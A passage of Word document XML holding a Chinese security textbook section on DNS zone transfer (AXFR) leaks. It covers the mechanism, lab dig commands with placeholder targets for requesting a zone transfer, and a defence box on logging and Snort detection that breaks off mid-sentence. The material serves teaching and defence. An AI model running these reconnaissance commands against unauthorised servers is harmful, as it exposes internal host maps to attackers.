        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送原本是一项用于在主、辅权威域名服务器之间同步完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（区域文件）的标准化机制。其设计初衷是在一个受信任的、封闭的网络管理域内，确保服务冗余和数据一致性。然而，这一机制的安全性建立在一个极其脆弱的假设之上：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">所有发起区域传送请求的节点都是合法的、受信任的辅服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。一旦这个信任假设因服务器配置疏忽而被打破，攻击者便无需通过繁琐的字典爆破，可直接从授权服务器“下载”一份包含目标域内所有主机记录（A、AAAA）、别名（CNAME）、邮件服务器（MX）等完整信息的区域文件。这正是基于协议信任模型缺陷的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术机理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送通常使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，而非标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，因为其传输的数据量可能超过单个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文的最大传输单元。标准化的区域传送查询类型为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR。一个完整的交互过程如下：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者首先需要通过被动或主动手段确定目标域的权威域名服务器列表。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后，攻击者选择一个权威服务器，向其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接建立后，攻击者发送一个查询类型为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询报文，请求获取目标域名的完整区域数据。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果服务器配置存在缺陷，允许未经授权的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，它将把整个区域文件作为一系列</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答报文发送给攻击者。此即一次成功的“DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送泄露”①【标准/通用原理，RFC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5936】。反之，一个正确配置的服务器会拒绝该请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操：尝试区域传送</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节实操环节使用标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令。该命令是几乎所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发行版的默认组件，也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">诊断的行业标准工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">环境依赖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：此部分命令操作依赖于一个已授权的、配置了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务的靶机环境。所有命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DNS_SERVER_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均为需替换为实际授权目标的占位符，实际值因环境而异②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">确定权威</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在尝试区域传送前，必须先找到负责解析该域的权威服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dig +short NS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：命令将返回一个或多个域名，这些是目标域的权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器。例如，可能返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ns1.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ns2.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等记录②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选择一个上一步查到的权威服务器，向其发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dig @</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS_SERVER_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DOMAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AXFR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置缺陷场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果目标服务器存在配置缺陷，将返回大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">资源记录（Resource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Records, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RRs），包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CNAME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，清晰地揭示了网络内部的主机名和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正常配置场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：命令将返回一个“Transfer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">failed”或类似拒绝访问的消息。这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">正确且安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为，表明服务器拒绝了未授权的区域传送请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connection timed out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器未监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，或被防火墙阻止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">transfer failed: REFUSED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务器已正确配置，拒绝了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。这不应被视为排错对象。这是安全基线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">no servers could be reached</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：指定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达，或输入有误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：区域传送泄露的检测与加固</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器上启用查询日志，并对包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AXFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型的所有请求进行告警。一个合法的区域传送通常发生在管理员预先定义好的主、辅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之间。任何来自非受信</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求都应被视为高优先级安全事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络流量分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：利用入侵检测系统，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata（将在本书卷五详述），编写规则以检测发往或来自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 53 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AXFR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询。例如，一条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则可以匹配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询报文中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> QTYPE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段值为</w:t>
